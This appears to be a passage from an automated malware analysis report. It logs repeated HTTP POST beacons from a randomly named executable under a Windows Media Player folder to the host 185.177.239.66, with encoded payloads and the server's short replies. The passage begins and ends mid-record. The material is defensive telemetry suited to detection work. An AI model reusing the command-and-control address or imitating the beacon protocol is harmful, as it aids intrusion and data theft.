                                                                                        Jan 8, 2025 18:08:55.530749083 CET2192OUTData Raw: 5c 5d 43 5e 5b 5e 57 5f 5e 5c 50 55 50 5a 5a 59 5a 5a 5b 59 54 57 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \]C^[^W_^\PUPZZYZZ[YTWUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_)!32$^$&+=-'')/*.>&>6U.;3;9.Y#,Z!+
                                                                                        Jan 8, 2025 18:08:55.856637955 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:55.990760088 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 3a 00 26 28 31 5d 20 06 08 57 2d 3e 20 5c 27 11 2d 5d 3e 56 30 04 2a 23 37 5a 28 05 38 59 3c 5d 25 5c 24 2c 2a 05 20 3c 22 01 21 3a 2c 5f 02 12 26 42 3f 32 34 56 29 59 37 1f 2a 37 26 07 20 0b 25 06 3f 33 22 51 23 29 3f 04 32 1d 3e 56 27 31 05 52 2a 3e 0d 5d 3b 07 31 12 21 39 21 50 0c 12 23 09 22 38 2b 0d 35 01 3d 15 28 01 35 07 32 0b 32 57 26 2a 2b 58 20 0a 20 0c 27 20 20 14 26 16 37 0d 25 2b 23 59 25 5f 2c 55 2e 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 98:&(1] W-> \'-]>V0*#7Z(8Y<]%\$,* <"!:,_&B?24V)Y7*7& %?3"Q#)?2>V'1R*>];1!9!P#"8+5=(522W&*+X ' &7%+#Y%_,U. S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.450025185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:55.800228119 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:56.162477016 CET2596OUTData Raw: 59 5d 43 5d 5e 59 57 5b 5e 5c 50 55 50 5d 5a 5f 5a 5b 5b 55 54 54 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y]C]^YW[^\PUP]Z_Z[[UTTUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]**$2<Z'50[=-X0-(R*T*&Q3-#3'--.Y#,Z!7
                                                                                        Jan 8, 2025 18:08:56.483486891 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:56.614466906 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.450026185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:56.896548986 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:57.260790110 CET2596OUTData Raw: 59 59 46 5e 5b 5e 57 5a 5e 5c 50 55 50 5c 5a 5d 5a 58 5b 5a 54 50 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYF^[^WZ^\PUP\Z]ZX[ZTPUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*!*%2$,Y)))['(T>?*>3-&T,?3<'.=.Y#,Z!3
                                                                                        Jan 8, 2025 18:08:57.600389004 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:57.738435984 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:57 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.450027185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:57.888900042 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:58.253427982 CET2596OUTData Raw: 59 58 43 58 5b 5a 52 5b 5e 5c 50 55 50 5b 5a 5a 5a 58 5b 58 54 52 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXCX[ZR[^\PUP[ZZZX[XTRUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9Y=-'!?%&$X()6$[7(/4(="0T.Y$'-.Y#,Z!/
                                                                                        Jan 8, 2025 18:08:58.572508097 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:58.710448027 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.450028185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:59.775526047 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:00.163105965 CET2592OUTData Raw: 59 5b 43 5c 5b 5f 52 58 5e 5c 50 55 50 59 5a 50 5a 5f 5b 54 54 57 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[C\[_RX^\PUPYZPZ_[TTWUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)10!73Z**3>;)*-"3-W9#':.Y#,Z!
                                                                                        Jan 8, 2025 18:09:00.448724985 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:00.591456890 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:00 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.450029185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:00.785177946 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:01.166233063 CET2596OUTData Raw: 59 5e 46 58 5b 59 57 59 5e 5c 50 55 50 58 5a 58 5a 5e 5b 5f 54 56 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^FX[YWY^\PUPXZXZ^[_TVUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)2=^'2 Z38\)%'(/'T(-.R&-.V.,4^0<^.=.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:01.472929955 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:01.611773014 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.450030185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:01.017096043 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:01.374419928 CET2192OUTData Raw: 5c 5e 46 58 5b 59 52 5d 5e 5c 50 55 50 5a 5a 5a 5a 5f 5b 5c 54 5d 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \^FX[YR]^\PUPZZZZ_[\T]U]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>!X'$\$&8(*![$?*?'T*--$!-#0,/..Y#,Z!+
                                                                                        Jan 8, 2025 18:09:01.709126949 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:01.846863985 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 5f 25 38 3d 5b 20 16 00 12 2c 2d 3c 59 30 11 31 16 29 33 3c 04 3e 30 20 03 2b 05 34 12 2b 05 2a 01 26 2c 2a 05 20 3c 29 58 36 3a 2c 5f 02 12 26 07 3c 22 23 09 3d 01 23 5b 29 0e 3d 5b 37 22 08 5d 2b 30 35 0d 36 39 2f 04 26 33 22 56 27 21 24 0d 3f 2d 28 00 3b 3e 21 5b 22 13 21 50 0c 12 20 57 21 16 12 56 21 5e 21 5d 28 38 04 59 32 25 2d 0c 31 39 2f 13 23 55 20 0d 24 23 3c 1b 26 38 23 0b 33 06 2f 5b 31 07 2b 08 2d 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989_%8=[ ,-<Y01)3<>0 +4+*&,* <)X6:,_&<"#=#[)=[7"]+0569/&3"V'!$?-(;>!["!P W!V!^!](8Y2%-19/#U $#<&8#3/[1+-( S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.450031185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:02.700252056 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:03.049895048 CET2596OUTData Raw: 59 53 43 59 5b 59 57 58 5e 5c 50 55 50 5f 5a 5c 5a 5f 5b 5e 54 53 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YSCY[YWX^\PUP_Z\Z_[^TSU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)13#'5$)*5X'.$=;Q*>:V'.:V,/0[%<09=.Y#,Z!?
                                                                                        Jan 8, 2025 18:09:03.358908892 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:03.490603924 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.450032185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:04.681320906 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:05.035536051 CET2596OUTData Raw: 59 52 43 5c 5b 58 57 51 5e 5c 50 55 50 58 5a 5a 5a 5f 5b 5d 54 52 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YRC\[XWQ^\PUPXZZZ_[]TRU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9Y)'T+%53=X0(R>7T)=-$-.Y+%?<-=.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:05.373123884 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:05.506798983 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.450033185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:05.682055950 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:06.030735016 CET2592OUTData Raw: 5c 59 46 5a 5b 59 57 5a 5e 5c 50 55 50 59 5a 5e 5a 5c 5b 5e 54 51 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YFZ[YWZ^\PUPYZ^Z\[^TQUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=1%! \$#>_6'-S>? )X13-.Y''+--.Y#,Z!
                                                                                        Jan 8, 2025 18:09:06.344084024 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:06.684874058 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0
                                                                                        Jan 8, 2025 18:09:06.703893900 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        27192.168.2.450034185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:06.848376989 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:07.202800989 CET2596OUTData Raw: 59 58 43 52 5b 55 52 5a 5e 5c 50 55 50 5c 5a 50 5a 5b 5b 5a 54 5c 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXCR[URZ^\PUP\ZPZ[[ZT\U]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9\=1%"0)*-'= >Y )-.'1.X$,<^:-.Y#,Z!3
                                                                                        Jan 8, 2025 18:09:07.524365902 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:07.656455040 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        28192.168.2.450035185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:07.238653898 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
